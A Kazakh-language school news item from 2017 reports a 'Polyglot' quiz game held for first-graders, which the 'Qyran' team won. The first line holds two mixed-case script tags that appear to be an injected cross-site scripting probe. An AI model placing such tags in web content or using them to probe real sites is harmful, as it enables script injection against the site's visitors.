<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2017

Ақпанның 25-і күні бастауыш сыныптарының «Ертеңгі болашақ – бүгінгі білімді ұрпақ» атты онкүндік жұмысының жоспарына сай бастауыш сынып мұғалімдері Мұратқызы Мөлдір және Варанкин Евгений Юрьевич 1 «А, Ә» сыныптарда ашық тәрбие сағаты, «Полиглот» интеллектуалды ойынын өткізді. Тәрбие сағатының мақсаты:

- Оқушылардың білімдерін сайысқа түсіріп, білімді, жан - жақты болуға, өзіне деген сенімділік қасиеттерін қалыптастыруға бейімдеу;

- дарынды, озық болуға тәрбиелеу;

- сөздік қорыларын байытып, осыған дейін алған білімдерін ортаға салу.

Ойынға екі топ қатысты: «Қыран» мен «Тұлпар». Ойын психологиялық дайындықтан басталды. Алты кезеңнен тұратын сайыс өте қызықты өтті. 1 сынып оқушылары қазақ тілі, орыс тілі, ағылшын тілінде өз білімдерін көрсете алды.

Ойын барысында оқушыларға қойылатын сауат ашу, математика, орыс тілі, ағылшын тілі пәндеріне қатысты сұрақтар болды. Оқушылар қызығып, жауаптарын беруге тырысты, ойынға белсене қатысты.

Әділ-қазылар алқасы ойынның жеңімпазы «Қыран» тобы деп шешті.

Просмотров: 660


Пікір қосу



Деректерді қолтаңбаға қосу